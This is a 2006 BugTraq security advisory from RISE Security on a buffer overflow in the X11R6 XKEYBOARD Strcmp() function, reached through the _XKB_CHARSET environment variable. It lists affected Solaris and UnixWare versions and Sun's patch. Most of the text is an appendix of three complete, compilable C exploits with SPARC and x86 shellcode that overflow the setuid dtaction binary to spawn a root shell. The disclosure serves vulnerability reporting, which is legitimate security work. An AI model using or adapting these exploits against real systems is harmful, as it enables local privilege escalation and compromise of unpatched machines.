BugTraq
[RISE-2006001] X11R6 XKEYBOARD extension Strcmp() buffer overflow Sep 08 2006 12:08AM
advisories risesecurity org
RISE-2006001

X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability

Released: September 07, 2006

Last updated: September 07, 2006

INTRODUCTION

There exists a vulnerability within a string manipulation function of the X11R6

(X11R6.4 and lower) X Window System library, which when properly exploited can

lead to local compromise of the vulnerable system.

This vulnerability was silently fixed in X11R6.5.1 release, but it is still

present in multiple vendors operating systems source tree.

This vulnerability was confirmed by us in the following versions and operating

systems, other versions and operating systems may be also affected.

Sun Solaris 10 SPARC/x86

Sun Solaris 9 SPARC/x86

Sun Solaris 8 SPARC/x86

SCO UnixWare 7.1.3

DETAILS

This vulnerability can be triggered by invoking a dynamicaly linked binary, with

_XKB_CHARSET environment variable set to a long string value, and DISPLAY

environment variable set to a X Window System server with the XKEYBOARD

extension enabled.

This is the vulnerable function (from X11R6.4).

static int

#if NeedFunctionPrototypes

Strcmp(char *str1, char *str2)

#else

Strcmp(str1, str2)

char *str1, *str2;

#endif

{

char str[256];

char c, *s;

for (s = str; c = *str1++; ) {

if (isupper(c))

c = tolower(c);

*s++ = c;

}

*s = '\0';

return (strcmp(str, str2));

}

The proof of concept codes we have written for this vulnerability can be found

in appendix section of this document.

All source codes from this document can be also downloaded from our website.

http://www.risesecurity.org/

VENDOR

Sun has released patches for this vulnerability, the Sun Alert ID is 102570

and it is available at the following URL:

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1

SCO did not answer to our email.

CREDITS

This vulnerability was discovered by Adriano Lima <adriano (at) risesecurity (dot) org [email concealed]> and

Filipe Balestra <filipe_balestra (at) hotmail (dot) com [email concealed]>.

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,

correctness, completeness or quality of the information provided in this

document. Liability claims regarding damage caused by the use of any information

provided, including any kind of information which is incomplete or incorrect,

will therefore be rejected.

APPENDIX

sol-sparc-xkb.c

/*

* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC

* Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>,

* Ramon de Carvalho Valle <ramon (at) risesecurity (dot) org [email concealed]>

*

* This program is free software; you can redistribute it and/or modify

* it under the terms of the GNU General Public License as published by

* the Free Software Foundation; either version 2 of the License, or

* (at your option) any later version.

*

* This program is distributed in the hope that it will be useful,

* but WITHOUT ANY WARRANTY; without even the implied warranty of

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

* GNU General Public License for more details.

*

* You should have received a copy of the GNU General Public License

* along with this program; if not, write to the Free Software

* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA

*

*/

/*

* Compile with the following command.

* $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c

*

* Set the DISPLAY environment variable to a X Window System server with

* XKEYBOARD extension enabled.

* $ ./sol-sparc-xkb sprintf|strcpy xserver:display

*

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <dlfcn.h>

#include <link.h>

#include <sys/systeminfo.h>

#include <procfs.h>

#define BUFSIZE 13+256+64+2+1

#define FRMSIZE 64+3+1

#define ADRSIZE 2047+1

#define SHLSIZE strlen(shellcode)+1

#define DSPSIZE strlen(display)+1

#define ARGSIZE 7+1

#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE

#define PFMSIZE strlen(platform)+1

#define PRGSIZE 20+1

#define PAD(a,b,c) a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);

char shellcode[]= /* 60 bytes */

"\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */

"\x82\x10\x20\x17" /* mov 0x17,%g1 */

"\x91\xd0\x20\x08" /* ta 0x08 */

"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */

"\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */

"\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */

"\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */

"\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */

"\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */

"\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */

"\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */

"\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */

"\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */

"\x82\x10\x20\x3b" /* mov 0x3b,%g1 */

"\x91\xd0\x20\x08" /* ta 0x08 */

;

void *find_symbol(const char *symbol){

void *handle,*addr;

char *err;

if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){

fprintf(stderr,"%s\n",dlerror());

exit(EXIT_FAILURE);

}

dlerror();

addr=dlsym(handle,symbol);

if((err=dlerror())!=NULL){

fprintf(stderr,"%s\n",err);

exit(EXIT_FAILURE);

}

dlclose(handle);

return addr;

}

void *find_rwxmem(void){

FILE *fp;

prmap_t map;

int flags;

void *addr;

if((fp=fopen("/proc/self/map","rb"))==NULL){

perror("fopen");

exit(EXIT_FAILURE);

}

while(fread(&map,sizeof(map),1,fp)){

flags=map.pr_mflags;

if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){

if(flags&MA_STACK) continue;

addr=(void *)map.pr_vaddr;

}

}

fclose(fp);

return addr;

}

int main(int argc,char **argv){

char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;

int base,offset,i,flag=0;

printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n");

printf("Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>\n\n");

if(argc!=3){

fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);

exit(EXIT_FAILURE);

}

if(!strcmp(argv[1],"sprintf")) flag=1;

if(!strcmp(argv[1],"strcpy")) flag=2;

if(!flag){

fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);

exit(EXIT_FAILURE);

}

snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);

if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){

perror("sysinfo");

exit(EXIT_FAILURE);

}

base=((int)argv[0]|0xffff);

base++;

offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;

PAD(offset,1,sizeof(envp)-1);

*((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;

*((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;

*((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;

switch(flag){

case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;

case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;

}

*((int *)addr[4])=(int)find_rwxmem()+4;

*((int *)addr[5])=*((int *)addr[4])-8;

p=buf;

sprintf(p,"_XKB_CHARSET=");

p=buf+13;

for(i=0;i<256;i++) *p++='A';

for(i=0;i<66;i++) *p++=addr[1][i%4];

*p='\0';

memcpy(buf+13+256+56,addr[0],4);

memcpy(buf+13+256+60,addr[3],4);

p=buf+1024;;

for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];

*p='\0';

memcpy(buf+1024+32,addr[4],4);

memcpy(buf+1024+36,addr[2],4);

memcpy(buf+1024+60,addr[5],4);

p=buf+2048;

for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];

*p='\0';

envp[0]=&buf[0];

envp[1]=&buf[1024];

envp[2]=&buf[2048];

envp[3]=shellcode;

envp[4]=display;

envp[5]=NULL;

execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);

exit(EXIT_FAILURE);

}

sol-x86-xkb.c

/*

* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86

* Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>,

* Ramon de Carvalho Valle <ramon (at) risesecurity (dot) org [email concealed]>

*

* This program is free software; you can redistribute it and/or modify

* it under the terms of the GNU General Public License as published by

* the Free Software Foundation; either version 2 of the License, or

* (at your option) any later version.

*

* This program is distributed in the hope that it will be useful,

* but WITHOUT ANY WARRANTY; without even the implied warranty of

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

* GNU General Public License for more details.

*

* You should have received a copy of the GNU General Public License

* along with this program; if not, write to the Free Software

* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA

*

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#define ADRSIZE 1024

#define NOPSIZE 4096

char shellcode[]= /* 47 bytes */

"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */

"\x6a\x65" /* pushl $0x65 */

"\x89\xe6" /* movl %esp,%esi */

"\xf7\x56\x04" /* notl 0x04(%esi) */

"\xf6\x16" /* notb (%esi) */

"\x31\xc0" /* xorl %eax,%eax */

"\x50" /* pushl %eax */

"\xb0\x17" /* movb $0x17,%al */

"\xff\xd6" /* call *%esi */

"\x31\xc0" /* xorl %eax,%eax */

"\x50" /* pushl %eax */

"\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */

"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */

"\x89\xe3" /* movl %esp,%ebx */

"\x50" /* pushl %eax */

"\x53" /* pushl %ebx */

"\x89\xe1" /* movl %esp,%ecx */

"\x50" /* pushl %eax */

"\x51" /* pushl %ecx */

"\x53" /* pushl %ebx */

"\xb0\x3b" /* movb $0x3b,%al */

"\xff\xd6" /* call *%esi */

;

int main(int argc,char **argv){

char buf[8192],display[256],addr[4],*envp[4],*p;

int i;

printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n");

printf("Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>\n\n");

if(argc!=2){

fprintf(stderr,"usage: %s xserver:display\n",argv[0]);

exit(EXIT_FAILURE);

}

snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);

*((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;

p=buf;

sprintf(p,"_XKB_CHARSET=");

p=buf+13;

for(i=0;i<256;i++) *p++='A';

for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];

for(i=0;i<NOPSIZE;i++) *p++='\x90';

for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];

*p='\0';

envp[0]=buf;

envp[1]=display;

envp[2]=NULL;

execle("/usr/dt/bin/dtaction","dtaction",0,envp);

exit(EXIT_FAILURE);

}

sco-x86-xkb.c

/*

* X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86

* Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>,

* Ramon de Carvalho Valle <ramon (at) risesecurity (dot) org [email concealed]>

*

* This program is free software; you can redistribute it and/or modify

* it under the terms of the GNU General Public License as published by

* the Free Software Foundation; either version 2 of the License, or

* (at your option) any later version.

*

* This program is distributed in the hope that it will be useful,

* but WITHOUT ANY WARRANTY; without even the implied warranty of

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

* GNU General Public License for more details.

*

* You should have received a copy of the GNU General Public License

* along with this program; if not, write to the Free Software

* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA

*

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#define ADRSIZE 1024

#define NOPSIZE 4096

char shellcode[]= /* 43 bytes */

"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */

"\x6a\x65" /* pushl $0x65 */

"\x89\xe6" /* movl %esp,%esi */

"\xf7\x56\x04" /* notl 0x04(%esi) */

"\xf6\x16" /* notb (%esi) */

"\x31\xc0" /* xorl %eax,%eax */

"\x50" /* pushl %eax */

"\xb0\x17" /* movb $0x17,%al */

"\xff\xd6" /* call *%esi */

"\x31\xc0" /* xorl %eax,%eax */

"\x50" /* pushl %eax */

"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */

"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */

"\x89\xe3" /* movl %esp,%ebx */

"\x50" /* pushl %eax */

"\x50" /* pushl %eax */

"\x53" /* pushl %ebx */

"\xb0\x3b" /* movb $0x3b,%al */

"\xff\xd6" /* call *%esi */

;

int main(int argc,char **argv){

char buf[8192],display[256],addr[4],*envp[4],*p;

int i;

printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n");

printf("Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>\n\n");

if(argc!=2){

fprintf(stderr,"usage: %s xserver:display\n",argv[0]);

exit(EXIT_FAILURE);

}

snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);

*((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;

p=buf;

sprintf(p,"_XKB_CHARSET=");

p=buf+13;

for(i=0;i<256;i++) *p++='A';

for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];

for(i=0;i<NOPSIZE;i++) *p++='\x90';

for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];

*p='\0';

envp[0]=buf;

envp[1]=display;

envp[2]=NULL;

execle("/usr/dt/bin/dtaction","dtaction",0,envp);

exit(EXIT_FAILURE);

}

Best regards,

RISE Security

http://www.risesecurity.org/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus